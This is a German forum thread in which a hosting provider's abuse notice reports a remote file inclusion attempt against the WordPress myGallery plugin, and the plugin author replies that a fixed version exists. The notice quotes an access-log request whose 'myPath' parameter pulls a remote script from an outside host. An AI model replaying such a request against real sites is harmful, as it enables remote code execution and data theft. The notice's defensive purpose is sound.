Crackversuch über myGallerie und WP 2.2.3

  • Sehr geehrter Herr …,

    wir registrierten vor kurzem einen Crackversuch auf unseren Servern, der
    von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
    Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
    Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
    Zugriff auf Ihre Daten erhalten konnte.

    Bitte prüfen Sie die Inhalte Ihrer Präsenz und ändern Sie Ihre
    Passwörter. Wir empfehlen Ihnen, schnellstmöglich Ihre Scripte zu
    überarbeiten, um solche Probleme so weit wie möglich auszuschliessen.

    Es handelt sich um das Script
    "/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php",
    welches über den Parameter "myPath" die Ausführung beliebigen Codes
    erlaubt:

    207.44.232.99 - - [05/Nov/2007:20:00:22 +0100] "GET
    /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=ht
    tp://holymusic.org/ver_2006/img/fq.txt? HTTP/1.1" 200 913
    http://ihre%20url "-" "libwww-perl/5.808" "-"

    Wir haben das PHP-Feature `allow_url_fopen' für das entsprechende
    Verzeichnis deaktiviert. Trotzdem empfehlen wir, das Script zu
    überarbeiten.

    Wir empfehlen Ihnen sich regelmäßig über Updates aller installierten
    Software zu informieren, z.B. über entsprechende Announce-Mailinglisten
    oder Foren des Herstellers. Insbesondere gilt dies auch für die
    Komponenten von Drittherstellern der verwendeten Applikationen. Diese
    sind mittlerweile ein gängiges Angriffsziel. Es werden mit Updates
    teilweise auch Lücken geschlossen, die nicht in den Release-Notes der
    Software verzeichnet sind. Verwenden Sie lediglich Programme aus
    vertrauenswürdigen Quellen.

    Falls Sie selbstgeschriebene Scripte einsetzen, dann dürfte folgender
    Artikel ebenfalls von Interesse für Sie sein:
    1&1 Hilfe-Center

    --
    Mit freundlichen Grüßen,

    Ingvar Gilbert
    1&1 WebHosting

    1&1 Internet AG
    Brauerstraße 48
    76135 Karlsruhe

    Amtsgericht Montabaur HRB 6484

    Vorstand: Henning Ahlert, Ralph Dommermuth, Matthias Ehrlich, Andreas
    Gauger, Matthias Greve, Robert Hoffmann, Norbert Lang, Achim Weiss
    Aufsichtsratsvorsitzender: Michael Scheeren

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Ich kann mich Nobbi nur anschließen - das Thema ist bald ein 3/4 Jahr alt (und seit dem gibt es auch eine sichere Version), und wurde zumindest bei mir im Blog ausführlich diskutiert.

    Es tut mir natürlich wahnsinnig leid, dass ich nicht jeden User von myGallery persönlich zu Hause besuche, und auf eine neu Version von myGallery hinweise...

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!